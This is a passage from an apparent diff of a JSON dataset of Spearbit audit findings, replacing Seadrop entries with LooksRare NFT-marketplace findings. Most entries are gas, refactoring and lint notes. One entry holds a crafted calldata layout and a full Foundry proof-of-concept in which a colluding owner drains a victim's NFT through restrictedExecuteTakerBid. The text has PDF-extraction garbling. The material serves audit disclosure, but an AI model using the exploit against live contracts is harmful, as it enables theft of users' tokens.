makerXxx which includes the strategyId) require the itemIds and amounts fields for the maker and the taker to mirror each other. i : the j th element of maker's itemIds fields (the struct would be either MakerBid or MakerAsk depending M j on the context) M j a : the j th element of maker's amounts fields (the struct would be either MakerBid or MakerAsk depending on the context) T j i : the j th element of taker's itemIds fields (the struct would be either TakerBid or TakerAsk depending on the context) T j a : the j th element of taker's amounts fields (the struct would be either TakerBid or TakerAsk depending on the context) Borrowing notations also from: \"Constraints among the number of item ids and amounts for taker or maker bids or asks are inconsistent among different strategies\" IneheritedStategy : T j i = M j StrategyDutchAuction : T j i , T j i = M j a = M j a i , T j a = M j a , taker can send extra itemIds and amounts but they won't be StrategyUSDDynamicAsk : T j i = M j i , T j a = M j a , taker can send extra itemIds and amounts but they won't be used. used. StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid : T 0 i = M 0 i , T 0 a = M 0 a = 1 , taker can send extra itemIds and amounts but they won't be used. StrategyFloorFromChainlink.execute...DiscountCollectionOfferStrategyWithTakerAsk : T 0 a = M 0 a = 1 , maker's itemIds are unused. StrategyCollectionOffer : T 0 a = M 0 a , maker's itemIds are unused and taker's T i a for i > 0 are also unused. StrategyItemIdsRange : M 0 i (cid:20) T j i (cid:20) M 1 i , P T j a = M 0 a . 39 For IneheritedStategy StrategyDutchAuction StrategyUSDDynamicAsk StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid Shared taker's itemIds and amounts are redundant as they should exactly match maker's fields. For the other strategies, one can encode the required parameters in either maker's or taker's additionalParameters fields.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Gas Optimization" + "LooksRare", + "Severity: Informational" ] }, { - "title": "A storage pointer should be cached instead of computed multiple times", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Caching a mapping's value in a local storage variable when the value is accessed multiple times saves gas due to not having to perform the same offset calculation every time.", + "title": "discount == 10_000 is not allowed in executeBasisPointsDiscountCollectionOfferStrategyWith- TakerAsk", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk reverts if discount == 10_000, but does not if discount == 99_99 which almost has the same effect. Note that if discount == 10_000, (forgetting about the revert) price = desiredPrice = 0. So, unless the taker (sender of the transaction) has set its takerAsk.minPrice to 0 (maker is bidding for a 100% discount and taker is gifting the NFT), the transaction would revert: if (takerAsk.minPrice > price) { // takerAsk.minPrice > 0 revert AskTooHigh(); }", "labels": [ "Spearbit", - "Seadrop", - "Severity: Gas Optimization" + "LooksRare", + "Severity: Informational" ] }, { - "title": "Comparing a boolean to a constant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Comparing to a constant (true or false) is a bit more expensive than directly checking the returned boolean value.", + "title": "Restructure executeMultipleTakerBids's input parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "executeMultipleTakerBids has the following form function executeMultipleTakerBids( OrderStructs.TakerBid[] calldata takerBids, OrderStructs.MakerAsk[] calldata makerAsks, bytes[] calldata makerSignatures, OrderStructs.MerkleTree[] calldata merkleTrees, address affiliate, bool isAtomic ) For the input parameters provided, we need to make sure takerBids, makerAsks, makerSignatures, and merkle- Trees all have the same length. We can enforce this requirement by definition, if we restructure the input passed to executeMultipleTakerBids.", "labels": [ "Spearbit", - "Seadrop", - "Severity: Gas Optimization" + "LooksRare", + "Severity: Informational" ] }, { - "title": "mintAllowList, mintSigned, or mintAllowedTokenHolder have an inherent cap for minting", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "mintAllowedTokenHolder is stored in a uint40 (after this audit uint32) which limits the maximum token id that can be minted using mintAllowList, mintSigned, or mintAllowedTokenHolder.", + "title": "Restructure transferBatchItemsAcrossCollections input parameter format", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "transferBatchItemsAcrossCollections has the following form function transferBatchItemsAcrossCollections( address[] calldata collections, uint256[] calldata assetTypes, address from, address to, uint256[][] calldata itemIds, uint256[][] calldata amounts ) where collections, assetTypes, itemIds and amounts are supposed to have the same lengths. One can enforce that by redefining the input parameter and have this invariant enforced by definition.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Consider replacing minterIfNotPayer parameter to always correspond to the minter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Currently, the variable minterIfNotPayer is treated in the following way: if the value is 0, then msg.sender would be considered as the minter. Otherwise, minterIfNotPayer would be considered as the minter. The logic can be simplified to always treat this variable as the minter. The 0 can be replaced by setting msg.sender as minterIfNotPayer. The variable should then be renamed as well--we recommend calling it minter afterwards.", + "title": "An approved operator can call transferBatchItemsAcrossCollections", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "TransferManager has 3 endpoints that an approved operator can call: transferItemsERC721 transferItemsERC1155 transferBatchItemsAcrossCollections The first 2 share the same input parameter types but differ from transferBatchItemsAcrossCollections: , address transferItemsERC1155 address ,! address[], address[], address, address , uint256[][], uint256[][] // ,! transferBatchItemsAcrossCollections , address, uint256[], uint256[] // transferItemsERC721, 44 An operator like LooksRareProtocol might have an owner ( OL ) that can select/add arbitrary endpoint of this transfer manager for an asset type, but only call the transfer manager using the same input parameter types regardless of the added endpoint. So in this case, OL might add a new asset type with TransferManager.transferBatchItemsAcrossCollections.selector as the selector and this transfer manager as the manager. Now, since this operator/LooksRareProtocol (and possibly other future implementations of approved operators) uses the same list of parameters for all endpoints, when _transferNFT gets called, the transfer manager using the transferBatchItemsAcrossCollections endpoint but with the following encoded data: the protocol would call abi.encodeWithSelector( managerSelectorOfAssetType[assetType].selector, collection, sender, recipient, itemIds, amounts ) ) A crafty OL might try to take advantage of the parameter type mismatch to create a malicious payload (address, address, address, uint256[], uint256[] ) that when decoded as (address[], address[], address, address, uint256[][], uint256[][]) It would allow them to transfer any NFT tokens from any user to some specific users. ; interpreted paramters | original parameter ,! ; ---------------------------------- ,! -------- c Ma.s or msg.sender 00000000000000000000000000000000000000000000000000000000000000c0 ; collections.ptr 0000000000000000000000000000000000000000000000000000000000000100 ; assetTypes.ptr ,! 00000000000000000000000000000000000000000000000000000000000000X3 ; from ,! 00000000000000000000000000000000000000000000000000000000000000X4 ; to ,! itemIds.ptr -> 0xa0 Tb.r or Mb.s x 0000000000000000000000000000000000000000000000000000000000000140 ; itemIds.ptr ,! amounts.ptr -> 0xc0 + 0x20 * itemIds.length 00000000000000000000000000000000000000000000000000000000000001c0 ; amounts.ptr ,! itemIds.length | collection | from / | to / | | | ; ; | itemIds[0] | itemIds[1] ... Fortunately, that is not possible since in this particular instance the transferItemsERC721 and transferItem- sERC1155's amounts's calldata tail pointer always coincide with transferBatchItemsAcrossCollections's itemIds's calldata tail pointer (uint256[] amounts, uint256[][] itemIds) which unless both have length 0 it would cause the compiled code to revert due to out of range index access. This is also dependent on if/how the compiler encodes/decodes the calldata and if the compiler would add the bytecodes for the deployed code to revert for OOR accesses (which solc does). This is just a lucky coincidence otherwise, OT could have exploited this flaw.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "The interface IERC721ContractMetadata does not extend IERC721 interface", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The current interface IERC721ContractMetadata does not include the ERC-721 functions. As a comparision, OpenZeppelin's IERC721Metadata.sol extends the IERC721 interface.", + "title": "Shared login in different StrategyFloorFromChainlink strategies can be refactored", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": " executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategyWithTakerBid. executeFixedDiscountCollectionOfferStrategyWithTakerAsk and executeBasisPointsDiscountCol- lectionOfferStrategyWithTakerAsk. Each group of endpoints in the above list share the exact same logic. The only difference they have is the formula and checks used to calculate the desiredPrice based on a given floorPrice and premium/discount. function a1() external view returns () { () = _a1(); // inlined computation of _a1 } function a2() external view returns () { () = _a2(); // inlined computation of _a2 }", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Add unit tests for mintSigned and mintAllowList in SeaDrop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The only test for the mintSigned and the mintAllowList functions are fuzz tests.", + "title": "Setting protocol and ask fee amounts and recipients can be refactored in ExecutionManager", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Setting and calculating the protocol and ask fee amounts and recipients follow the same logic in _executeStrategyForTakerAsk and _executeStrategyForTakerBid.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Rename a variable with a misleading name", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "enumeratedDropsLength variable name in SeaDrop._removeFromEnumeration is a bit misleading since _removeFromEnumeration is used also for signer lists, feeRecipient lists, etc..", + "title": "Creator fee amount and recipient calculation can be refactored in ExecutionManager", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "The create fee amount and recipient calculation in _executeStrategyForTakerAsk and _executeS- trategyForTakerBid are identical and can be refactored.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "The protocol rounds the fees in the favour of creatorPaymentAddress", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The feeAmount calculation rounds down, i.e., rounds in the favour of creatorPaymentAddress and against feeRecipient. For a minuscule amount of ETH (price such that price * feeBps < 10000), the fees received by the feeRecipient would be 0. An interesting case here would be if the value quantity * price * feeBps is greater than or equal to 10000 and price * feeBps < 10000. In this case, the user can split the mint transaction into multiple transactions to skip the fees. However, this is unlikely to be profitable, considering the gas overhead involved as well as the minuscule amount of savings.", + "title": "The owner can set the selector for a strategy to any bytes4 value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "The owner can set the selector for a strategy to any bytes4 value (as long as it's not bytes4(0)). Even though the following check exists if (!IBaseStrategy(implementation).isLooksRareV2Strategy()) { revert NotV2Strategy(); } There is no measure taken to avoid potential selector collision with other contract types.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Consider using type(uint).max as the magic value for maxTokenSupplyForStage instead of 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The value 0 is currently used as magic value to mean that maxTokenSupplyForStage to mean that the check quantity + currentTotalSupply > maxTokenSupplyForStage. However, the value type(uint).max is a more appropriate magic value in this case. This also avoids the need for additional branching if (maxTo- kenSupplyForStage != MAGIC_VALUE) as the condition quantity + currentTotalSupply > type(uint).max is never true.", + "title": "Constraints among the number of item ids and amounts for taker or maker bids or asks are incon- sistent among different strategies.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Constraints among the number of item ids and amounts for taker or maker bids or asks are incon- sistent among different strategies. notation description Ti Ta Mi Ma length of taker's bid (or ask depending on the context) item ids length of taker's bid (or ask depending on the context) amounts length of maker's bid (or ask depending on the context) item ids length of maker's bid (or ask depending on the context) amounts 59 IneheritedStategy : Ti = Ta = Mi = Ma StrategyItemIdsRange : Ti (cid:20) Ta, Mi = 2, Ma = 1 (related issue) StrategyDutchAuction : Mi (cid:20) Ti , Ma (cid:20) Ta, Mi = Ma StrategyUSDDynamicAsk: Mi (cid:20) Ti , Ma (cid:20) Ta, Mi = Ma StrategyFloorFromChainlink.execute...PremiumStrategyWithTakerBid : Mi (cid:20) Ti , Ma (cid:20) Ta, Mi = Ma = 1 StrategyFloorFromChainlink.execute...DiscountCollectionOfferStrategyWithTakerAsk : Ti = 1, 1 = Ta, Ma = 1 StrategyCollectionOffer : Ti = 1, 1 (cid:20) Ta, Ma = 1 The equalities above are explicitly enforced, but the inequalities are implicitly enforced through the compiler's out-of-bound revert. Note that in most cases (except StrategyItemIdsRange) one can enforce Ti = Ta = Mi = Ma and refactor this logic into a utility function.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Missing edge case tests on uninitialized AllowList", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The default value for _allowListMerkleRoots[nftContract] is 0. A transaction that tries to mint an NFT in this case with an empty proof (or any other proof) should revert. There were no tests for this case.", + "title": "Requirements/checks for adding new transfer managers (or strategies) are really important to avoid self-reentrancy through restrictedExecuteTakerBid from unexpected call sites", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "When a new transfer manager gets added to the protocol, there is a check to make sure that this manager cannot be the protocol itself. This is really important as restrictedExecuteTakerBid allows the protocol itself to call this endpoint. If the check below was omitted: if ( transferManagerForAssetType == address(0) || // transferManagerForAssetType == address(this) || selectorForAssetType == bytes4(0) ) { } revert ManagerSelectorEmpty(); The owner can add the protocol itself as a transfer manager for a new asset type and pick the selector to be ILooksRareProtocol.restrictedExecuteTakerBid.selector. Then the owner along with a special address can collude and drain users' NFT tokens from an actual approved transfer manager for ERC721/ERC1155 assets. The special feature of restrictedExecuteTakerBid is that once it's called the provided parameters by the maker are not checked/verified against any signatures. The PoC below includes 2 different custom strategies for an easier setup but they are not necessary (one can use the default strategy). One creates the calldata payload and the other is called later on to select a desired NFT token id. 60 The calldata to restrictedExecuteTakerBid(...) is crafted so that the corresponding desired parameters for an actual transferManager.call can be set by itemIds; parameters offset ,! ------------------------------------------------------------------------------------------------------- c ,! 0x0000 interpreted parameters ---------- | original msg.sender, , can be changed by stuffing 0s 0000000000000000000000000000000000000000000000000000000000000080 0000000000000000000000000000000000000000000000000000000000000180 ,! 00000000000000000000000000000000000000000000000000000000000000X1 ; sender ,! 00000000000000000000000000000000000000000000000000000000000000a0 ,! msg.sender / signer ho, orderHash, 0xa0 | collection | signer / | Ta.r or | i[] ptr 0x0080 ,! to, can be changed by stuffing 0s 00000000000000000000000000000000000000000000000000000000000000X2 ; Tb.r | a[] ptr , 0x0180 00000000000000000000000000000000000000000000000000000000000000X3 ; Tb.p_max 00000000000000000000000000000000000000000000000000000000000000a0 00000000000000000000000000000000000000000000000000000000000000c0 00000000000000000000000000000000000000000000000000000000000000e0 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 from 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000X4 ; sid 00000000000000000000000000000000000000000000000000000000000000X5 ; t 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000X6 ; T 00000000000000000000000000000000000000000000000000000000000000X7 ; C 00000000000000000000000000000000000000000000000000000000000000X8 ; signer ,! 00000000000000000000000000000000000000000000000000000000000000X9 ; ts 00000000000000000000000000000000000000000000000000000000000000Xa ; te 0000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000001c0 00000000000000000000000000000000000000000000000000000000000001e0 0000000000000000000000000000000000000000000000000000000000000200 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 | i[].len | i[0] | i[1] | i[2] | i[3] | i[4] | i[5] | i[6] | i[7] | i[8] | i[9] | i[10] | i[11] | i[12] | i[13] , | i[14] | i[15] | i[16] | i[17] | i[18] | i[19] | i[20] | i[21] | i[22] ; T = real_collection ; C = currency ; t = assetType ; sid = strategyId ; ts = startTime ; te = endTime ; Ta = takerAsk ; Tb = takerBid // file: test/foundry/AssetAttack.t.sol pragma solidity 0.8.17; import {IStrategyManager} from \"../../contracts/interfaces/IStrategyManager.sol\"; import {IBaseStrategy} from \"../../contracts/interfaces/IBaseStrategy.sol\"; import {OrderStructs} from \"../../contracts/libraries/OrderStructs.sol\"; import {ProtocolBase} from \"./ProtocolBase.t.sol\"; import {MockERC20} from \"../mock/MockERC20.sol\"; 61 interface IERC1271 { function isValidSignature( bytes32 digest, bytes calldata signature ) external returns (bytes4 magicValue); } contract PayloadStrategy is IBaseStrategy { address private owner; address private collection; address private currency; uint256 private assetType; address private signer; uint256 private nextStartegyId; constructor() { owner = msg.sender; } function set( address _collection, address _currency, uint256 _assetType, address _signer, uint256 _nextStartegyId ) external { if(msg.sender != owner) revert(); collection = _collection; currency = _currency; assetType = _assetType; signer = _signer; nextStartegyId = _nextStartegyId; } function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function execute( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ ) external view returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) { itemIds = new uint256[](23); itemIds[0] = 0xa0; itemIds[1] = 0xc0; itemIds[2] = 0xe0; 62 itemIds[8] = nextStartegyId; itemIds[9] = assetType; itemIds[11] = uint256(uint160(collection)); itemIds[12] = uint256(uint160(currency)); itemIds[13] = uint256(uint160(signer)); itemIds[14] = 0; // startTime itemIds[15] = type(uint256).max; // endTime itemIds[17] = 0x01c0; itemIds[18] = 0x01e0; itemIds[19] = 0x0200; } } contract ItemSelectorStrategy is IBaseStrategy { address private owner; uint256 private itemId; uint256 private amount; constructor() { owner = msg.sender; } function set( uint256 _itemId, uint256 _amount ) external { if(msg.sender != owner) revert(); itemId = _itemId; amount = _amount; } function isLooksRareV2Strategy() external pure override returns (bool) { return true; } function execute( OrderStructs.TakerBid calldata /* takerBid */ , OrderStructs.MakerAsk calldata /* makerAsk */ external view returns ( uint256 price, uint256[] memory itemIds, uint256[] memory amounts, bool isNonceInvalidated ) itemIds = new uint256[](1); itemIds[0] = itemId; amounts = new uint256[](1); amounts[0] = amount; ) { } } contract AttackTest is ProtocolBase { PayloadStrategy private payloadStrategy; 63 ItemSelectorStrategy private itemSelectorStrategy; MockERC20 private mockERC20; // // can be an arbitrary address uint256 private signingOwnerPK = 42; address private signingOwner = vm.addr(signingOwnerPK); // this address will define an offset in the calldata // and can be changed up to a certain upperbound by // stuffing calldata with 0s. address private specialUser1 = address(0x180); // NFT token recipient of the attack can also be changed // up to a certain upper bound by stuffing the calldata with 0s address private specialUser2 = address(0x3a0); // can be an arbitrary address address private victimUser = address(505); function setUp() public override { super.setUp(); vm.startPrank(_owner); { looksRareProtocol.initiateOwnershipTransfer(signingOwner); } vm.stopPrank(); vm.startPrank(signingOwner); { looksRareProtocol.confirmOwnershipTransfer(); mockERC20 = new MockERC20(); looksRareProtocol.updateCurrencyWhitelistStatus(address(mockERC20), true); looksRareProtocol.updateCreatorFeeManager(address(0)); mockERC20.mint(victimUser, 1000); mockERC721.mint(victimUser, 1); // This particular strategy is not a requirement of the exploit. // it just makes it easier payloadStrategy = new PayloadStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, PayloadStrategy.execute.selector, true, address(payloadStrategy) ); itemSelectorStrategy = new ItemSelectorStrategy(); looksRareProtocol.addStrategy( 0, 0, 0, ItemSelectorStrategy.execute.selector, false, address(itemSelectorStrategy) ); } 64 vm.stopPrank(); _setUpUser(victimUser); } function testAttack() public { vm.startPrank(signingOwner); looksRareProtocol.addTransferManagerForAssetType( 2, address(looksRareProtocol), looksRareProtocol.restrictedExecuteTakerBid.selector ); payloadStrategy.set( address(mockERC721), address(mockERC20), 0, victimUser, 2 // itemSelectorStrategy ID ); itemSelectorStrategy.set(1, 1); OrderStructs.MakerBid memory makerBid = _createSingleItemMakerBidOrder({ // payloadStrategy bidNonce: 0, subsetNonce: 0, strategyId: 1, assetType: 2, // LooksRareProtocol itself orderNonce: 0, collection: address(0x80), // calldata offset currency: address(mockERC20), signer: signingOwner, maxPrice: 0, itemId: 1 }); bytes memory signature = _signMakerBid(makerBid, signingOwnerPK); OrderStructs.TakerAsk memory takerAsk; vm.stopPrank(); vm.prank(specialUser1); looksRareProtocol.executeTakerAsk( takerAsk, makerBid, signature, _EMPTY_MERKLE_TREE, _EMPTY_AFFILIATE ); assertEq(mockERC721.balanceOf(victimUser), 0); assertEq(mockERC721.ownerOf(1), specialUser2); } }", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Consider naming state variables as public to replace the user-defined getters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Several state variables, for example, mapping(address => PublicDrop) private _publicDrops; but have corresponding getters defined (function getPublicDrop(address have private visibility, nftContract)). Replacing private by public and renaming the variable name can decrease the code. There are several examples of the above pattern in the codebase, however we are only listing one here for brevity.", + "title": "viewCreatorFeeInfo can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "viewCreatorFeeInfo includes a low-level staticcall to collection's royaltyInfo endpoint and later its return status is compared and the return data is decoded.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Use bytes.concat instead of abi.encodePacked for concatenation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "While one of the uses of abi.encodePacked is to perform concatenation, the Solidity language does contain a reserved function for this: bytes.concat.", + "title": "_verifyMerkleProofOrOrderHash can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "_verifyMerkleProofOrOrderHash includes a if/else block that calls into _computeDigestAndVer- ify with almost the same inputs (only the hash is different).", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Misleading comment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The comment says // Check that the sender is the owner of the allowedNftTokenId.. However, minter isn't necessarily the sender due to how it's set: address minter = minterIfNotPayer != address(0) ? minterIfNotPayer : msg.sender;.", + "title": "isOperatorValidForTransfer can be modified to refactor more of the logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "isOperatorValidForTransfer is only used to revert if necessary. The logic around the revert decision on all call sites.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Use i instead of j as an index name for a non-nested for-loop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "Using an index named j instead of i is confusing, as this naming convention makes developers expect that the for-loop is nested, but this is not the case. Using i is more standard and less surprising.", + "title": "Keep maximum allowed number of characters per line to 120.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "There are a few long lines in the code base. contracts/executionStrategies/StrategyCollectionOffer.sol 21:2 27:2 29:2 30:2 67:2 69:2 70:2 118:2 119:2 error error error error error error error error error Line length must be no more than 120 but current length is 127 Line length must be no more than 120 but current length is 163 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 163 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 123 Line length must be no more than 120 but current length is 121 max-line-length max-line-length max-line-length max-line-length max-line-length max-line-length max-line-length max-line-length max-line-length contracts/executionStrategies/StrategyDutchAuction.sol 20:2 22:2 23:2 26:5 70:31 85:2 86:2 92:5 error error error warning warning error error warning Line length must be no more than 120 but current length is 163 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 121 Function has cyclomatic complexity 9 but allowed no more than 7 Avoid to make time-based decisions in your business logic Line length must be no more than 120 but current length is 123 Line length must be no more than 120 but current length is 121 Function has cyclomatic complexity 8 but allowed no more than 7 max-line-length max-line-length max-line-length code-complexity not-rely-on-time max-line-length max-line-length code-complexity contracts/executionStrategies/StrategyItemIdsRange.sol 15:2 20:2 21:2 22:2 23:2 25:5 100:2 101:2 error error error error error warning error error Line length must be no more than 120 but current length is 142 Line length must be no more than 120 but current length is 163 Line length must be no more than 120 but current length is 163 Line length must be no more than 120 but current length is 121 Line length must be no more than 120 but current length is 121 Function has cyclomatic complexity 12 but allowed no more than 7 Line length must be no more than 120 but current length is 123 Line length must be no more than 120 but current length is 121 max-line-length max-line-length max-line-length max-line-length max-line-length code-complexity max-line-length max-line-length contracts/helpers/OrderValidatorV2A.sol 40:2 ,! 53:2 ,! error Line length must be no more than 120 but current length is 121 error Line length must be no more than 120 but current length is 121 max-line-length max-line-length 69 225:2 ,! 279:2 ,! 498:24 ,! 501:26 ,! 511:2 ,! 593:5 ,! 662:5 ,! 758:5 ,! 830:5 ,! 843:17 ,! 850:17 ,! 906:5 ,! 963:5 ,! 12:2 ,! 18:2 ,! 23:2 ,! 49:5 ,! 81:2 ,! 144:2 ,! error Line length must be no more than 120 but current length is 127 max-line-length error Line length must be no more than 120 but current length is 127 max-line-length warning Avoid to make time-based decisions in your business logic not-rely-on-time warning Avoid to make time-based decisions in your business logic not-rely-on-time error Line length must be no more than 120 but current length is 143 max-line-length warning Function has cyclomatic complexity 9 but allowed no more than 7 warning Function has cyclomatic complexity 9 but allowed no more than 7 code-complexity code-complexity warning Function order is incorrect, internal view function can not go after internal pure function (line 727) ordering warning Function has cyclomatic complexity 10 but allowed no more than 7 code-complexity warning Avoid to use inline assembly. It is acceptable only in rare cases no-inline-assembly warning Avoid to use inline assembly. It is acceptable only in rare cases warning Function has cyclomatic complexity 8 but allowed no more than 7 no-inline-assembly code-complexity warning Function has cyclomatic complexity 8 but allowed no more than 7 code-complexity contracts/helpers/ValidationCodeConstants.sol 17:2 18:2 error error Line length must be no more than 120 but current length is 129 Line length must be no more than 120 but current length is 121 max-line-length max-line-length contracts/interfaces/ILooksRareProtocol.sol 160:2 error Line length must be no more than 120 but current length is 122 max-line-length contracts/libraries/OrderStructs.sol error Line length must be no more than 120 but current length is 292 error Line length must be no more than 120 but current length is 292 max-line-length max-line-length error Line length must be no more than 120 but current length is 127 max-line-length warning Function order is incorrect, struct definition can not go after state variable declaration (line 26) ordering error Line length must be no more than 120 but current length is 128 max-line-length error Line length must be no more than 120 but current length is 131 max-line-length 49 problems (34 errors, 15 warnings)", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Avoid duplicating code for consistency", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "The _checkActive function is used in every mint function besides mintPublic where the code is almost the same.", + "title": "avoid transferring in _transferFungibleTokens when sender and recipient are equal", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "Currently, there is no check in _transferFungibleTokens to avoid transferring funds from sender to recipient when they are equal. There is only one check outside of _transferFungibleTokens when one wants to transfer to an affiliate. But if the bidUser is the creator, or the ask recipient or the protocolFeeRecipient, the check is missing.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "restrictFeeRecipients is always true for either PublicDrop or TokenGatedDrop in ERC721SeaDrop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "restrictFeeRecipients is always true for either PublicDrops or TokenGatedDrops. When either one of these drops gets created/updated by calling one of the four functions below on a ERC721SeaDrop contract, its value is hardcoded as true: updatePublicDrop updatePublicDropFee updateTokenGatedDrop updateTokenGatedDropFee", + "title": "Keep the order of parameters consistent in updateStrategy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "In updateStrategy, isActive is set first when updating storage, and it's the second parameter when supplied to the StrategyUpdated event. But it is the last parameter supplied to updateStrategy.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Reformat lines for better readability", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "These lines are too long to be readable. A mistake isn't easy to spot.", + "title": "_transferFungibleTokens does not check whether the amount is 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "_transferFungibleTokens does not check whether amount is 0 to skip transferring to recipient. For the ask recipient and creator amounts the check is performed just before calling this function. But the check is missing for the affiliate and protocol fees.", "labels": [ "Spearbit", - "Seadrop", + "LooksRare", "Severity: Informational" ] }, { - "title": "Comment is a copy-paste", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seadrop-Spearbit-Security-Review.pdf", - "body": "This comment is exactly the same as this one. This is a copy-paste mistake.", + "title": "StrategyItemIdsRange.executeStrategyWithTakerAsk - Maker's bid amount might be entirely ful- filled by a single ERC1155 item", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LooksRare-Spearbit-Security-Review.pdf", + "body": "StrategyItemIdsRange allows a buyer to specify a range of potential item ids (both 